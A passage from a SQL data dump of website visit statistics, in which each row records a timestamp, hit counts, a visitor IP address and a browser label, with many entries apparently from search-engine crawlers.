,1,0,0,'62.210.215.100','chrome'),(27582,1459144594,1,1,0,0,'91.196.178.67','firefox'),(27583,1459144797,1,1,0,0,'217.69.136.208','other'),(27584,1459145087,1,1,0,0,'217.69.133.218','other'),(27585,1459145261,1,1,0,0,'37.54.16.232','chrome'),(27586,1459145611,1,1,0,0,'66.249.93.227','chrome'),(27587,1459145714,2,2,0,0,'91.196.178.134','firefox'),(27588,1459145931,1,1,0,0,'217.69.133.229','other'),(27589,1459145932,1,1,0,0,'217.69.133.231','other'),(27590,1459145947,2,2,0,0,'66.249.78.65','other'),(27591,1459145982,1,1,0,0,'217.69.133.221','other'),(27592,1459146031,1,1,0,0,'66.249.66.47','other'),(27593,1459146136,1,1,0,0,'91.196.178.101','chrome'),(27594,1459146216,1,1,0,0,'66.249.78.51','other'),(27595,1459146224,2,2,0,0,'94.179.13.72','chrome'),(27596,1459146374,2,2,0,0,'94.179.86.126','chrome'),(27597,1459146441,2,2,0,0,'144.76.7.107','other'),(27598,1459147100,1,1,0,0,'91.196.178.164','other'),(27599,1459147393,1,1,0,0,'66.249.92.49','other'),(27600,1459147439,2,2,0,0,'66.249.78.58','other'),(27601,1459147474,1,1,0,0,'8.29.198.26','other'),(27602,1459147481,1,1,0,0,'157.55.39.31','other'),(27603,1459147562,1,1,0,0,'62.210.170.165','other'),(27604,1459147573,1,1,0,0,'66.249.78.65','other'),(27605,1459148022,1,1,0,0,'82.145.217.140','other'),(27606,1459148067,1,1,0,0,'95.133.60.104','chrome'),(27607,1459148072,2,2,0,0,'91.196.178.164','firefox'),(27608,1459148195,1,0,1,0,'66.249.66.44',''),(27609,1459148351,1,1,0,0,'217.69.133.220','other'),(27610,1459148358,1,1,0,0,'95.132.66.1','chrome'),(27611,1459148393,1,1,0,0,'91.196.178.162','firefox'),(27612,1459148711,1,1,0,0,'141.0.15.15','other'),(27613,1459148718,1,1,0,0,'37.54.132.232','chrome'),(27614,1459148822,1,1,0,0,'91.196.178.65','chrome'),(27615,1459149210,1,1,0,0,'89.163.148.58','other'),(27616,1459149568,1,1,0,0,'217.69.133.215','other'),(27617,1459149746,1,1,0,0,'66.249.78.65','other'),(27618,1459149870,1,1,0,0,'141.0.15.15','other'),(27619,1459150137,1,1,0,0,'91.196.179.69','firefox'),(27620,1459150389,1,1,0,0,'217.69.133.220','other'),(27621,1459150458,1,1,0,0,'217.69.133.229','other'),(27622,1459150491,1,1,0,0,'157.55.39.165','other'),(27623,1459150568,1,1,0,0,'130.180.216.170','firefox'),(27624,1459150772,1,1,0,0,'141.0.15.15','other'),(27625,1459151015,1,1,0,0,'141.0.15.15','opera'),(27626,1459151394,1,1,0,0,'91.196.177.20','chrome'),(27627,1459151550,1,1,0,0,'213.111.247.102','opera'),(27628,1459151866,1,1,0,0,'207.46.13.127','other'),(27629,1459152083,1,1,0,0,'46.201.240.112','firefox'),(27630,1459152240,1,1,0,0,'91.196.178.130','chrome'),(27631,1459152320,1,1,0,0,'217.69.133.239','other'),(27632,1459152324,1,1,0,0,'123.125.71.92','other'),(27633,1459152439,1,1,0,0,'217.69.133.217','other'),(27634,1459152516,1,1,0,0,'180.76.15.162','other'),(27635,1459152775,1,1,0,0,'91.196.178.67','chrome'),(27636,1459152797,1,1,0,0,'91.196.178.97','chrome'),(27637,1459152983,1,1,0,0,'217.69.133.219','other'),(27638,1459153037,1,1,0,0,'217.69.133.227','other'),(27639,1459153277,1,1,0,0,'217.69.133.69','other'),(27640,1459153278,1,1,0,0,'217.69.133.233','other'),(27641,1459153403,23,22,1,0,'66.249.78.51',''),(27642,1459153463,1,1,0,0,'46.201.174.40','chrome'),(27643,1459153511,5,5,0,0,'66.249.66.44','other'),(27644,1459153579,2,2,0,0,'66.249.78.65','other'),(27645,1459153609,2,2,0,0,'66.249.78.58','other'),(27646,1459153649,2,2,0,0,'130.193.50.34','other'),(27647,1459153685,2,2,0,0,'66.249.66.47','other'),(27648,1459153696,1,0,1,0,'68.180.231.29',''),(27649,1459153848,1,1,0,0,'91.196.178.130','chrome'),(27650,1459154024,1,1,0,0,'94.179.67.18','firefox'),(27651,1459154129,1,1,0,0,'178.154.189.202','other'),(27652,1459154272,4,4,0,0,'66.249.78.51','other'),(27653,1459154355,2,2,0,0,'91.196.178.162','chrome'),(27654,1459154435,1,1,0,0,'94.179.121.188','firefox'),(27655,1459154575,2,2,0,0,'66.249.78.58','other'),(27656,1459154643,1,1,0,0,'94.179.112.246','firefox'),(27657,1459154693,1,1,0,0,'178.154.189.203','other'),(27658,1459154778,1,1,0,0,'82.207.96.172','chrome'),(27659,1459154806,1,1,0,0,'94.179.118.248','firefox'),(27660,1459154875,1,1,0,0,'91.196.178.70','firefox'),(27661,1459154991,1,1,0,0,'176.241.109.94','firefox'),(27662,1459155458,3,3,0,0,'130.193.50.34','other'),(27663,1459155462,1,1,0,0,'5.255.253.113','other'),(27664,1459155506,1,1,0,0,'91.196.178.66','firefox'),(27665,1459155637,7,7,0,0,'141.8.183.25','other'),(27666,1459155641,1,1,0,0,'141.8.132.101','other'),(27667,1459155645,2,2,0,0,'130.193.51.83','other'),(27668,1459155649,1,1,0,0,'141.8.183.19','other'),(27669,1459155653,1,1,0,0,'141.8.132.10','other'),(27670,1459155708,1,1,0,0,'93.158.152.51','other'),(27671,1459155856,1,1,0,0,'130.180.218.146','firefox'),(27672,1459155858,1,1,0,0,'37.52.61.232','firefox'),(27673,1459156065,1,1,0,0,'141.8.142.85','other'),(27674,1459156325,1,1,0,0,'141.8.142.58','other'),(27675,1459156341,19,19,0,0,'141.8.132.105','other'),(27676,1459156363,2,2,0,0,'130.193.51.19','other'),(27677,1459156378,23,23,0,0,'130.193.50.34','other'),(27678,1459156422,2,2,0,0,'5.255.253.113','other'),(27679,1459156535,1,1,0,0,'180.76.15.17','other'),(27680,1459156541,2,2,0,0,'91.196.178.70','chrome'),(27681,1459156607,1,1,0,0,'46.201.241.5','chrome'),(27682,1459156611,1,1,0,0,'217.69.133.218','other'),(27683,1459156614,1,1,0,0,'94.179.53.72','firefox'),(27684,1459156807,5,0,5,0,'68.180.231.29',''),(27685,1459156932,1,1,0,0,'94.179.123.163','firefox'),(27686,1459157054,1,1,0,0,'217.69.133.221','other'),(27687,1459157359,1,1,0,0,'217.69.133.240','other'),(27688,1459157360,1,1,0,0,'217.69.133.234','other'),(27689,1459157559,1,1,0,0,'91.196.178.164','firefox'),(27690,1459157774,2,2,0,0,'141.8.142.61','other'),(27691,1459157778,1,1,0,0,'130.193.50.34','other'),(27692,1459157881,5,5,0,0,'144.76.29.162','other'),(27693,1459157976,1,1,0,0,'91.196.178.72','chrome'),(27694,1459158082,1,0,1,0,'68.180.231.29',''),(27695,1459158138,2,2,0,0,'5.255.253.113','other'),(27696,1459158309,1,1,0,0,'8.29.198.25','other'),(27697,1459158412,1,1,0,0,'66.249.92.43','other'),(27698,1459158490,1,1,0,0,'5.9.62.130','other'),(27699,1459158674,1,1,0,0,'141.8.142.67','other'),(27700,1459158680,3,3,0,0,'130.193.51.19','other'),(27701,1459158682,1,1,0,0,'66.249.78.58','other'),(27702,1459158695,4,4,0,0,'141.8.132.105','other'),(27703,1459158721,1,1,0,0,'141.8.183.25','other'),(27704,1459159182,1,1,0,0,'217.69.133.13','other'),(27705,1459159591,1,1,0,0,'217.69.133.222','other'),(27706,1459159676,1,1,0,0,'91.196.178.72','chrome'),(27707,1459159743,1,1,0,0,'66.249.93.229','chrome'),(27708,1459159747,1,1,0,0,'91.196.179.69','chrome'),(27709,1459159971,2,2,0,0,'130.193.51.83','other'),(27710,1459160140,1,1,0,0,'66.249.78.58','other'),(27711,1459160549,1,1,0,0,'178.94.41.203','msie'),(27712,1459160603,24,24,0,0,'130.193.50.34','other'),(27713,1459160611,5,5,0,0,'141.8.132.105','other'),(27714,1459160804,1,1,0,0,'66.249.78.99','other'),(27715,1459160900,1,0,1,0,'68.180.231.29',''),(27716,1459161052,3,3,0,0,'66.249.78.65','other'),(27717,1459161435,1,1,0,0,'130.180.217.175','chrome'),(27718,1459161446,1,1,0,0,'217.69.136.208','other'),(27719,1459161447,1,1,0,0,'217.69.136.207','other'),(27720,1459161487,1,1,0,0,'91.196.179.69','chrome'),(27721,1459161905,1,1,0,0,'66.249.66.47','other'),(27722,1459162034,11,11,0,0,'92.236.71.145','other'),(27723,1459162214,1,1,0,0,'91.196.178.69','firefox'),(27724,1459162925,1,1,0,0,'91.196.178.134','firefox'),(27725,1459163050,1,1,0,0,'217.69.133.227','other'),(27726,1459163283,1,1,0,0,'91.196.178.169','chrome'),(27727,1459163442,1,1,0,0,'182.118.53.31','msie'),(27728,1459163717,1,1,0,0,'217.69.133.67','other'),(27729,1459163944,1,1,0,0,'157.55.39.165','other'),(27730,1459164325,1,1,0,0,'217.69.133.241','other'),(27731,1459164328,1,1,0,0,'217.69.133.246','other'),(27732,1459164342,1,1,0,0,'217.69.133.225','other'),(27733,1459164343,1,1,0,0,'217.69.133.224','other'),(27734,1459164722,2,2,0,0,'91.196.179.69','firefox'),(27735,1459164967,1,1,0,0,'217.69.133.28','other'),(27736,1459164968,1,1,0,0,'217.69.133.30','other'),(27737,1459164995,1,1,0,0,'130.193.50.34','other'),(27738,1459164999,1,1,0,0,'5.255.253.113','other'),(27739,1459165002,1,1,0,0,'91.196.178.72','chrome'),(27740,1459165061,1,1,0,0,'130.180.220.152','chrome'),(27741,1459165102,1,1,0,0,'66.249.69.77','other'),(27742,1459165184,1,1,0,0,'217.69.133.217','other'),(27743,1459165288,1,1,0,0,'95.135.91.48','firefox'),(27744,1459165644,1,1,0,0,'78.111.190.105','chrome'),(27745,1459165685,1,1,0,0,'91.196.178.67','chrome'),(27746,1459165706,2,2,0,0,'217.69.133.70','other'),(27747,1459165842,2,2,0,0,'91.196.178.66','firefox'),(27748,1459165865,2,2,0,0,'91.196.178.65','chrome'),(27749,1459166267,1,1,0,0,'180.76.15.12','other'),(27750,1459166499,2,2,0,0,'91.196.178.72','chrome'),(27751,1459166579,1,1,0,0,'91.196.178.68','chrome'),(27752,1459166666,1,1,0,0,'91.196.178.70','firefox'),(27753,1459166825,2,2,0,0,'91.196.178.65','chrome'),(27754,1459166875,1,1,0,0,'91.201.180.87','opera'),(27755,1459166903,1,1,0,0,'91.196.178.66','firefox'),(27756,1459167355,1,1,0,0,'217.69.133.215','other'),(27757,1459167401,2,2,0,0,'91.196.178.72','chrome'),(27758,1459167823,1,1,0,0,'66.249.69.156','other'),(27759,1459168152,1,1,0,0,'217.69.133.220','other'),(27760,1459168178,1,1,0,0,'178.154.189.202','other'),(27761,1459168191,1,0,1,0,'68.180.231.29',''),(27762,1459168279,1,1,0,0,'91.194.84.106','other'),(27763,1459168286,1,1,0,0,'94.178.164.7','firefox'),(27764,1459168703,1,0,1,0,'66.249.69.93',''),(27765,1459168912,1,1,0,0,'217.69.133.246','other'),(27766,1459169052,1,1,0,0,'66.249.91.37','other'),(27767,1459169097,3,1,2,0,'66.249.69.77',''),(27768,1459169138,1,1,0,0,'95.135.91.48','firefox'),(27769,1459169261,2,0,2,0,'68.180.231.29',''),(27770,1459169285,1,1,0,0,'8.29.198.26','other'),(27771,1459169465,2,2,0,0,'130.193.50.34','other'),(27772,1459169518,1,1,0,0,'178.154.189.203','other'),(27773,1459169804,1,1,0,0,'217.69.133.223','other'),(27774,1459169868,1,0,1,0,'66.249.69.85',''),(27775,1459169892,2,2,0,0,'213.160.137.182','firefox'),(27776,1459169957,1,0,1,0,'66.249.69.156',''),(27777,1459170014,1,1,0,0,'217.69.133.236','other'),(27778,1459170031,1,1,0,0,'94.179.50.16','chrome'),(27779,1459170490,1,1,0,0,'157.55.39.165','other'),(27780,1459170649,1,1,0,0,'37.54.31.157','chrome'),(27781,1459170796,1,1,0,0,'141.8.183.25','other'),(27782,1459171008,1,1,0,0,'37.53.228.109','chrome'),(27783,1459171641,1,1,0,0,'5.255.253.113','other'),(27784,1459171645,1,1,0,0,'141.8.132.105','other'),(27785,1459171728,1,1,0,0,'130.193.51.19','other'),(27786,1459171950,3,3,0,0,'91.196.178.66','firefox'),(27787,1459172026,1,0,1,0,'66.249.69.85',''),(27788,1459172080,3,0,3,0,'68.180.231.29',''),(27789,1459172218,1,1,0,0,'217.69.133.18','other'),(27790,1459172321,1,1,0,0,'217.69.133.223','other'),(27791,1459172396,1,1,0,0,'91.196.178.68','firefox'),(27792,1459172475,1,0,1,0,'66.249.69.93',''),(27793,1459172639,1,1,0,0,'62.210.215.100','chrome'),(27795,1459172640,1,1,0,0,'37.59.253.53','chrome'),(27796,1459172836,1,1,0,0,'217.69.133.228','other'),(27797,1459172841,1,1,0,0,'91.196.178.164','firefox'),(27798,1459172978,2,0,2,0,'66.249.69.77',''),(27799,1459173029,1,1,0,0,'91.196.178.66','chrome'),(27800,1459173231,1,0,1,0,'68.180.231.29',''),(27801,1459173255,3,3,0,0,'91.196.178.66','firefox'),(27802,1459173413,1,1,0,0,'162.210.196.100','other'),(27803,1459173522,3,3,0,0,'141.8.132.83','other'),(27804,1459173556,1,1,0,0,'91.196.178.70','msie'),(27805,1459173729,1,0,1,0,'66.249.69.156',''),(27806,1459173901,1,1,0,0,'217.69.133.220','other'),(27807,1459173985,2,1,1,0,'66.249.69.93',''),(27808,1459174026,1,1,0,0,'91.196.178.103','chrome'),(27809,1459174068,2,2,0,0,'93.158.152.40','other'),(27810,1459174072,3,3,0,0,'130.193.51.14','other'),(27811,1459174075,2,2,0,0,'93.158.152.51','other'),(27812,1459174079,3,3,0,0,'130.193.51.79','other'),(27813,1459174083,3,3,0,0,'141.8.142.85','other'),(27814,1459174086,3,3,0,0,'141.8.132.101','other'),(27815,1459174090,2,2,0,0,'130.193.50.38','other'),(27816,1459174093,1,1,0,0,'93.158.152.61','other'),(27817,1459174097,2,2,0,0,'5.255.253.68','other'),(27818,1459174104,1,1,0,0,'195.62.14.156','chrome'),(27819,1459174105,3,3,0,0,'141.8.132.41','other'),(27820,1459174107,8,8,0,0,'130.193.50.34','other'),(27821,1459174111,2,2,0,0,'5.255.253.113','other'),(27822,1459174114,4,4,0,0,'130.193.50.6','other'),(27823,1459174117,3,3,0,0,'93.158.152.84','other'),(27824,1459174120,1,1,0,0,'217.69.133.229','other'),(27825,1459174121,4,4,0,0,'141.8.183.19','other'),(27827,1459174127,3,3,0,0,'141.8.132.10','other'),(27828,1459174134,3,3,0,0,'5.255.253.67','other'),(27829,1459174137,3,3,0,0,'178.154.149.10','other'),(27830,1459174140,2,2,0,0,'178.154.189.37','other'),(27831,1459174143,2,2,0,0,'141.8.142.25','other'),(27832,1459174152,6,6,0,0,'141.8.132.105','other'),(27833,1459174155,2,2,0,0,'130.193.51.19','other'),(27834,1459174187,3,3,0,0,'141.8.183.25','other'),(27835,1459174196,1,1,0,0,'141.8.142.61','other'),(27836,1459174198,2,2,0,0,'141.8.142.67','other'),(27837,1459174226,2,2,0,0,'130.193.51.83','other'),(27838,1459174262,1,1,0,0,'178.154.189.31','other'),(27839,1459174291,1,1,0,0,'141.8.142.58','other'),(27840,1459174489,1,1,0,0,'91.196.178.70','firefox'),(27841,1459175076,1,1,0,0,'217.69.133.218','other'),(27842,1459175220,1,1,0,0,'157.55.39.152','other'),(27843,1459175261,1,1,0,0,'91.196.178.98','chrome'),(27844,1459175511,1,1,0,0,'217.69.133.68','other'),(27845,1459175521,2,2,0,0,'217.69.133.221','other'),(27846,1459175809,300,300,0,0,'69.30.214.210','other'),(27847,1459175825,1,1,0,0,'217.69.133.69','other'),(27848,1459176061,1,1,0,0,'178.92.68.203','firefox'),(27849,1459176238,2,2,0,0,'5.255.253.68','other'),(27850,1459176312,1,1,0,0,'217.69.133.12','other'),(27851,1459176313,1,1,0,0,'217.69.133.14','other'),(27852,1459176315,1,1,0,0,'217.69.133.13','other'),(27853,1459176361,2,2,0,0,'141.8.184.11','other'),(27854,1459176363,1,0,1,0,'66.249.69.85',''),(27855,1459176365,2,2,0,0,'141.8.132.10','other'),(27856,1459176373,2,2,0,0,'141.8.132.52','other'),(27857,1459176378,2,2,0,0,'130.193.51.19','other'),(27858,1459176382,2,2,0,0,'141.8.132.101','other'),(27859,1459176386,2,2,0,0,'141.8.132.105','other'),(27860,1459176390,1,1,0,0,'178.154.149.10','other'),(27861,1459176394,2,2,0,0,'5.255.253.9','other'),(27862,1459176396,1,1,0,0,'217.69.133.84','other'),(27863,1459176398,2,2,0,0,'130.193.51.79','other'),(27864,1459176403,1,1,0,0,'130.193.37.7','other'),(27865,1459176407,1,1,0,0,'141.8.142.85','other'),(27866,1459176411,1,1,0,0,'178.154.189.37','other'),(27867,1459176415,1,1,0,0,'141.8.142.25','other'),(27868,1459176419,2,2,0,0,'93.158.152.61','other'),(27869,1459176428,1,1,0,0,'178.154.149.11','other'),(27870,1459176436,1,1,0,0,'5.255.253.47','other'),(27871,1459176440,3,3,0,0,'130.193.50.34','other'),(27872,1459176445,1,1,0,0,'5.255.253.53','other'),(27873,1459176449,1,1,0,0,'93.158.152.84','other'),(27874,1459176457,1,1,0,0,'93.158.152.40','other'),(27875,1459176462,1,1,0,0,'178.154.189.31','other'),(27876,1459176470,1,1,0,0,'93.158.152.46','other'),(27877,1459176474,1,1,0,0,'141.8.142.10','other'),(27878,1459176492,1,1,0,0,'5.255.253.113','other'),(27879,1459176496,1,1,0,0,'130.193.51.83','other'),(27880,1459176505,1,1,0,0,'141.8.142.61','other'),(27881,1459176508,1,0,1,0,'68.180.231.29',''),(27882,1459176509,1,1,0,0,'141.8.142.67','other'),(27883,1459176513,1,1,0,0,'141.8.183.19','other'),(27884,1459176518,1,1,0,0,'130.193.50.38','other'),(27885,1459176545,2,2,0,0,'157.55.39.152','other'),(27886,1459176880,1,1,0,0,'91.196.178.164','firefox'),(27887,1459176894,2,0,2,0,'66.249.69.77',''),(27888,1459177096,1,1,0,0,'77.52.180.238','chrome'),(27889,1459177335,1,0,1,0,'66.249.69.93',''),(27890,1459177390,1,1,0,0,'91.196.178.65','firefox'),(27891,1459177475,1,1,0,0,'91.196.178.66','chrome'),(27892,1459177950,1,1,0,0,'66.249.69.93','other'),(27893,1459178050,1,1,0,0,'217.69.133.238','other'),(27895,1459178051,1,1,0,0,'217.69.133.234','other'),(27896,1459178205,1,1,0,0,'93.158.152.61','other'),(27897,1459178209,1,1,0,0,'130.193.51.83','other'),(27898,1459178214,1,1,0,0,'141.8.183.19','other'),(27899,1459178289,1,1,0,0,'180.76.15.20','other'),(27900,1459178310,1,0,1,0,'68.180.231.29',''),(27901,1459178394,1,0,1,0,'66.249.69.77',''),(27902,1459178595,1,1,0,0,'217.69.133.28','other'),(27903,1459178596,1,1,0,0,'217.69.133.29','other'),(27904,1459178614,1,1,0,0,'66.249.69.150','other'),(27905,1459178836,1,1,0,0,'46.201.227.188','opera'),(27906,1459179220,1,1,0,0,'93.115.95.205','chrome'),(27907,1459179243,1,1,0,0,'193.90.12.88','chrome'),(27908,1459179317,1,0,1,0,'66.249.69.77',''),(27909,1459179338,1,1,0,0,'217.69.133.84','other'),(27910,1459179362,2,0,2,0,'66.249.69.85',''),(27911,1459179599,1,1,0,0,'141.8.142.61','other'),(27912,1459179604,1,1,0,0,'130.193.50.6','other'),(27913,1459179607,1,1,0,0,'66.249.91.41','other'),(27914,1459179608,1,1,0,0,'141.8.132.41','other'),(27915,1459179612,1,1,0,0,'5.255.253.67','other'),(27916,1459179617,14,14,0,0,'130.193.50.34','other'),(27917,1459179621,1,1,0,0,'93.158.152.46','other'),(27918,1459179629,5,5,0,0,'141.8.132.105','other'),(27919,1459179665,5,5,0,0,'141.8.183.25','other'),(27920,1459179666,4,4,0,0,'5.255.253.113','other'),(27921,1459179668,1,1,0,0,'130.193.51.83','other'),(27922,1459180228,1,1,0,0,'217.69.133.228','other'),(27923,1459180253,2,0,2,0,'68.180.231.29',''),(27924,1459180275,1,1,0,0,'8.29.198.26','other'),(27925,1459180907,1,1,0,0,'95.135.91.48','firefox'),(27926,1459181139,1,0,1,0,'66.249.69.85',''),(27927,1459181412,1,1,0,0,'217.69.133.223','other'),(27928,1459181563,1,0,1,0,'68.180.231.29',''),(27929,1459182178,2,1,1,0,'66.249.69.93',''),(27930,1459182676,1,1,0,0,'217.69.133.28','other'),(27931,1459182747,1,1,0,0,'66.249.69.77','other'),(27932,1459183359,2,2,0,0,'217.69.136.203','other'),(27933,1459183362,1,1,0,0,'217.69.136.206','other'),(27934,1459183512,1,0,1,0,'66.249.69.93',''),(27935,1459183854,2,0,2,0,'68.180.231.29',''),(27936,1459184305,1,1,0,0,'217.69.133.29','other'),(27937,1459184341,2,0,2,0,'66.249.69.85',''),(27938,1459184708,1,1,0,0,'207.46.13.127','other'),(27939,1459184761,1,1,0,0,'217.69.133.67','other'),(27940,1459184780,2,2,0,0,'194.44.141.255','chrome'),(27941,1459184916,1,1,0,0,'217.69.133.225','other'),(27942,1459185249,1,1,0,0,'130.193.50.34','other'),(27943,1459185250,1,1,0,0,'141.8.183.25','other'),(27944,1459186128,1,1,0,0,'217.69.133.237','other'),(27945,1459186227,1,0,1,0,'68.180.229.103',''),(27946,1459186913,1,0,1,0,'68.180.231.29',''),(27947,1459186943,252,252,0,0,'144.76.61.21','other'),(27948,1459187130,1,1,0,0,'62.210.215.100','chrome'),(27949,1459187666,2,0,2,0,'66.249.69.77',''),(27950,1459187742,2,2,0,0,'130.193.50.34','other'),(27952,1459188069,2,0,2,0,'66.249.69.93',''),(27953,1459188085,1,0,1,0,'66.249.69.162',''),(27954,1459188209,1,0,1,0,'66.249.69.85',''),(27955,1459188394,1,1,0,0,'217.69.133.218','other'),(27956,1459188773,2,0,2,0,'66.249.69.77',''),(27957,1459188930,1,1,0,0,'217.69.133.6','other'),(27958,1459188931,1,1,0,0,'217.69.133.3','other'),(27959,1459188981,1,1,0,0,'217.69.133.224','other'),(27960,1459189010,1,1,0,0,'141.8.132.105','other'),(27961,1459189077,1,1,0,0,'91.196.178.136','chrome'),(27962,1459189115,1,0,1,0,'66.249.69.85',''),(27963,1459189272,1,1,0,0,'141.8.183.25','other'),(27964,1459189286,3,3,0,0,'130.193.50.34','other'),(27965,1459189448,1,1,0,0,'217.69.133.227','other'),(27966,1459189614,1,1,0,0,'217.69.133.18','other'),(27967,1459189655,1,1,0,0,'95.135.91.48','firefox'),(27968,1459189737,1,1,0,0,'180.76.15.143','other'),(27969,1459189873,1,1,0,0,'52.10.200.50','opera'),(27970,1459189975,2,2,0,0,'141.8.132.105','other'),(27971,1459190002,1,0,1,0,'68.180.231.29',''),(27972,1459190110,1,1,0,0,'207.46.13.127','other'),(27973,1459190271,1,1,0,0,'66.249.91.41','other'),(27974,1459190361,1,1,0,0,'217.69.133.235','other'),(27975,1459190421,3,3,0,0,'141.8.142.61','other'),(27976,1459190538,1,1,0,0,'217.69.133.218','other'),(27977,1459190771,2,2,0,0,'130.193.50.34','other'),(27978,1459190772,1,1,0,0,'5.255.253.67','other'),(27979,1459190775,1,1,0,0,'141.8.142.67','other'),(27980,1459190790,1,1,0,0,'141.8.183.19','other'),(27981,1459190794,1,1,0,0,'93.158.152.40','other'),(27982,1459190803,1,1,0,0,'141.8.142.25','other'),(27983,1459190831,1,1,0,0,'178.154.149.10','other'),(27984,1459190837,1,1,0,0,'130.193.51.14','other'),(27985,1459190840,1,1,0,0,'5.255.253.113','other'),(27986,1459190841,2,2,0,0,'141.8.183.25','other'),(27987,1459190845,1,1,0,0,'130.193.51.19','other'),(27988,1459190897,3,3,0,0,'141.8.132.105','other'),(27989,1459191123,1,1,0,0,'8.29.198.26','other'),(27990,1459191672,1,1,0,0,'130.193.51.83','other'),(27991,1459191731,1,1,0,0,'217.69.133.224','other'),(27992,1459191795,1,1,0,0,'217.69.133.217','other'),(27994,1459191825,1,1,0,0,'217.69.133.219','other'),(27995,1459191870,1,1,0,0,'157.55.39.31','other'),(27996,1459191886,2,0,2,0,'68.180.231.29',''),(27997,1459191923,1,1,0,0,'217.69.133.239','other'),(27998,1459192415,1,1,0,0,'141.8.132.105','other'),(27999,1459192710,1,1,0,0,'207.46.13.127','other'),(28000,1459192838,2,0,2,0,'66.249.69.85',''),(28001,1459193104,1,1,0,0,'130.193.51.19','other'),(28002,1459193605,2,2,0,0,'217.69.133.236','other'),(28003,1459193606,1,1,0,0,'217.69.133.237','other'),(28004,1459193608,1,1,0,0,'217.69.133.235','other'),(28005,1459193859,1,1,0,0,'141.8.132.105','other'),(28006,1459194018,1,0,1,0,'66.249.69.93',''),(28007,1459194326,1,1,0,0,'91.196.178.68','chrome'),(28008,1459194645,1,1,0,0,'141.8.183.25','other'),(28009,1459194646,2,2,0,0,'5.255.253.113','other'),(28011,1459194692,1,1,0,0,'217.69.133.9','other'),(28012,1459194699,1,1,0,0,'82.145.217.187','other'),(28013,1459194925,1,1,0,0,'180.76.15.22','other'),(28014,1459195106,1,0,1,0,'68.180.231.29',''),(28015,1459195542,1,1,0,0,'217.69.133.194','other'),(28016,1459195588,1,1,0,0,'157.55.39.31','other'),(28017,1459196041,1,1,0,0,'141.8.142.67','other'),(28018,1459196374,1,1,0,0,'195.191.59.24','other'),(28019,1459196565,2,2,0,0,'66.249.69.162','other'),(28020,1459196576,2,1,1,0,'66.249.69.85',''),(28021,1459196586,2,2,0,0,'66.249.69.77','other'),(28022,1459196745,1,1,0,0,'217.69.133.240','other'),(28023,1459196950,1,1,0,0,'130.193.51.83','other'),(28024,1459197053,1,1,0,0,'217.69.133.221','other'),(28025,1459197354,1,1,0,0,'46.172.233.0','chrome'),(28026,1459197437,1,1,0,0,'95.134.203.213','chrome'),(28027,1459197746,1,0,1,0,'66.249.69.85',''),(28028,1459197895,2,2,0,0,'141.8.183.25','other'),(28029,1459197964,1,1,0,0,'66.249.69.85','other'),(28030,1459199295,299,299,0,0,'213.239.205.207','other'),(28031,1459199415,4,4,0,0,'130.193.50.34','other'),(28032,1459199984,1,0,1,0,'66.249.69.162',''),(28033,1459200628,2,2,0,0,'141.8.183.25','other'),(28034,1459200776,1,0,1,0,'66.249.69.85',''),(28035,1459200982,2,0,2,0,'66.249.69.93',''),(28036,1459201323,1,0,1,0,'66.249.69.77',''),(28037,1459201582,1,1,0,0,'66.249.91.45','other'),(28039,1459201611,1,1,0,0,'217.69.133.67','other'),(28040,1459201965,1,1,0,0,'62.210.215.100','chrome'),(28041,1459201997,1,1,0,0,'8.29.198.26','other'),(28042,1459202176,1,1,0,0,'141.8.183.25','other'),(28043,1459202486,1,1,0,0,'217.69.133.244','other'),(28044,1459202487,2,2,0,0,'217.69.133.190','other'),(28045,1459202595,2,0,2,0,'66.249.69.85',''),(28046,1459202776,1,1,0,0,'217.69.133.243','other'),(28047,1459202990,1,0,1,0,'66.249.69.77',''),(28048,1459203041,1,1,0,0,'217.69.133.225','other'),(28050,1459203155,2,0,2,0,'66.249.69.93',''),(28051,1459203334,1,1,0,0,'130.193.50.34','other'),(28052,1459203336,1,1,0,0,'130.193.51.83','other'),(28053,1459203846,1,1,0,0,'141.8.142.58','other'),(28054,1459203847,1,1,0,0,'141.8.142.61','other'),(28055,1459203848,1,1,0,0,'130.193.51.19','other'),(28056,1459204084,1,1,0,0,'62.210.215.100','chrome'),(28057,1459204117,1,0,1,0,'68.180.231.29',''),(28058,1459204809,1,1,0,0,'217.69.133.70','other'),(28059,1459205050,1,1,0,0,'130.193.50.34','other'),(28060,1459205190,1,0,1,0,'66.249.69.85',''),(28061,1459205300,2,0,2,0,'66.249.69.93',''),(28062,1459205328,1,0,1,0,'66.249.69.156',''),(28063,1459205704,8,8,0,0,'144.76.12.75','other'),(28064,1459206082,1,1,0,0,'217.69.133.224','other'),(28066,1459206083,2,2,0,0,'217.69.133.220','other'),(28068,1459206084,1,1,0,0,'217.69.133.226','other'),(28069,1459206378,1,1,0,0,'130.193.50.34','other'),(28071,1459206379,3,3,0,0,'130.193.51.83','other'),(28072,1459206380,3,3,0,0,'5.255.253.113','other'),(28073,1459206381,3,3,0,0,'141.8.132.105','other'),(28074,1459206409,4,4,0,0,'69.30.213.18','other'),(28075,1459206423,1,1,0,0,'157.55.39.165','other'),(28076,1459206573,1,1,0,0,'217.69.133.193','other'),(28077,1459206574,1,1,0,0,'217.69.133.11','other'),(28078,1459207221,1,0,1,0,'66.249.69.156',''),(28079,1459207478,1,0,1,0,'66.249.69.85',''),(28080,1459207817,1,0,1,0,'66.249.69.93',''),(28081,1459207935,2,1,1,0,'66.249.69.85',''),(28082,1459208006,2,2,0,0,'217.69.133.231','other'),(28083,1459208087,1,1,0,0,'217.69.133.237','other'),(28084,1459208108,1,1,0,0,'66.249.69.93','other'),(28085,1459208696,1,1,0,0,'180.153.236.102','msie'),(28086,1459208985,3,0,3,0,'66.249.69.77',''),(28087,1459209131,1,1,0,0,'217.69.133.68','other'),(28088,1459209523,1,1,0,0,'183.207.228.40','chrome'),(28089,1459209525,2,2,0,0,'120.198.231.21','firefox'),(28090,1459209529,1,1,0,0,'120.198.231.21','chrome'),(28091,1459210127,25,25,0,0,'188.40.95.70','other'),(28092,1459210239,2,2,0,0,'130.193.50.34','other'),(28093,1459210465,1,1,0,0,'66.249.69.77','other'),(28094,1459210691,1,0,1,0,'68.180.231.29',''),(28095,1459210715,2,2,0,0,'217.69.133.240','other'),(28096,1459210716,1,1,0,0,'217.69.133.70','other'),(28097,1459210717,1,1,0,0,'217.69.133.239','other'),(28098,1459210819,1,1,0,0,'217.69.133.226','other'),(28099,1459210820,1,1,0,0,'217.69.133.224','other'),(28100,1459211785,1,1,0,0,'217.69.133.217','other'),(28101,1459211883,1,1,0,0,'217.69.133.228','other'),(28102,1459211975,1,1,0,0,'217.69.133.72','other'),(28103,1459212015,1,0,1,0,'66.249.69.85',''),(28104,1459212237,2,1,1,0,'66.249.